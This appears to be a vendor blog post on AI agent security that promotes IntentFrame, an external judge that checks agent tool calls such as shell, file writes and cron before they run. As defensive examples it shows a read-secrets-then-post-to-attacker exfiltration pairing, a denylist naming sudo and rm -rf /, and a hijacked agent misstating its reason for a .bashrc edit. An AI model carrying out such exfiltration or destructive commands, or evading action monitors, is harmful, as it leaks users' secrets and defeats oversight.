Prompt guardrails and in-process allowlists fail when the model is wrong or hijacked. AI agent security needs an external judge that authorizes actions before they run.

Most teams building with AI agents start in the same place: system prompts, tool allowlists, human-in-the-loop approval for dangerous commands. That works until it doesn't — and when it fails, it fails silently.
The model doesn't need to "break out" of anything. It just needs to be wrong, tricked, or over-eager while holding tools that can run shell commands, write files, or schedule cron jobs. At that moment, the question isn't whether your prompt was good. It's whether anything outside the agent can stop the action before it runs.
That's the core of AI agent security: not better instructions, but structural separation between proposal and execution.
An agent "turns thought into effect" the moment it executes a tool. Every consequential tool call crosses a trust boundary:
User intent → Model reasoning → Tool call → Side effect on host/network/dataMost agent stacks treat security as a layer inside that pipeline:
These controls share a fatal assumption: the agent process remains trustworthy. But the agent process is exactly what you're trying to constrain. It hosts the model, parses tool calls, and dispatches handlers. When the model is manipulated via prompt injection, confused by ambiguous instructions, or operating autonomously on a schedule, you're asking the same runtime that wanted the action to also veto it.
| Approach | Where rules live | Failure mode |
|---|---|---|
| Prompt-only | Model context | No enforcement at execution |
| In-process allowlists | Agent config | Same process can be bypassed or misconfigured |
| Human approval | Operator UI | Doesn't scale; often skipped under load |
| External policy runtime | Separate process | Agent proposes; judge authorizes independently |
AI agent security that holds up in production needs the last row: an external judge.
IntentFrame implements this pattern as validate-only governance:
You → Agent proposes an action → External policy runtime checks your rules
├─ ALLOW → action runs
└─ BLOCK → logged, never runsThree properties matter:
This is the same architectural instinct behind OAuth, API gateways, and service meshes: authorization is not a feature of the caller; it's a gate the caller must pass through.

Take Hermes Agent as a concrete example. Hermes ships serious safety features: command approval, allowlists, container isolation. Those run inside the Hermes stack.
IntentFrame doesn't replace Hermes. It adds an external checkpoint for the tools that can actually touch your machine:
| Hermes alone | Hermes + IntentFrame | |
|---|---|---|
| Where rules live | Prompts, config, allowlists inside Hermes | Policy YAML outside the agent |
| Who validates risky tools | The Hermes runtime | IntentFrame, before the action runs |
| If the model is tricked | Same process that wanted to act | External judge blocks + audit trail |
The integration governs Hermes's highest-risk tools by default: terminal, execute_code, write_file, patch, and cronjob. Reads like read_file stay ungoverned in v1 — a deliberate tradeoff, with an important caveat below.
Gating only the executor isn't enough. A serious AI agent security gate touches two surfaces:
| Layer | What it is | What the gate does |
|---|---|---|
| Schema | Tool spec shown to the model | Requires a reason field so the model explains intent |
| Executor | Function that runs the tool | Calls external validator; runs original handler only on ALLOW |
Patching only the executor means the model never supplies structured intent. Patching only the schema means you ask for reasons but never enforce them. You need both, every time.
The Hermes integration implements this as a plugin that wraps governed tool handlers: validate via a local adapter → strip reason → delegate to the untouched original handler on ALLOW.
Blanket tool gating creates friction without proportional risk reduction. The right axis is:
"Changes state OR communicates externally."
| Govern | Leave in-process (usually) |
|---|---|
| Shell / code execution | Parsing, formatting, math |
| File writes, deletes | Internal read-only helpers |
| Cron / scheduled autonomy | Retrieval whose output stays in context |
| Outbound messaging, webhooks |
Watch the exfiltration pairing:
read_file("secrets") → http_post("https://attacker/?data=...")Neither call is a "write," but together they leak. AI agent security must govern outbound channels even when they aren't local mutations.
Select by tool name, not toolset. Hermes's file toolset mixes read_file (read) and write_file (write). Toolset-level filters are too coarse.
External authorization isn't one check. IntentFrame runs a pipeline:
sudo, rm -rf /), capability denylistsreason matches the actual operation, especially for ambiguous or high-impact actionsDeterministic rules catch obvious violations in milliseconds. Semantic review catches scope mismatches — like a user asking to "add a comment" to .bashrc when the patch would overwrite a privileged shell config file.
Both layers produce audit logs independent of the agent's own logging.

If you're evaluating AI agent security tooling, ask four questions:
Prompt engineering, RBAC on API keys, and sandboxing each solve adjacent problems. None replaces runtime authorization by an external judge.
IntentFrame's Hermes integration is the first shipped example of this pattern: a plugin gate, adapter sidecar, policy backend, and operator control plane — all outside Hermes's own process boundary.
Related: Deploy AI agent governance on Hermes · Runtime authorization incident teardown · Deployment options
Photos from Unsplash (license):
See how IntentFrame checks every action against hard limits and plain-English policy before it runs. Related GitHub repos you might want to check: IntentFrame core · Hermes agent integration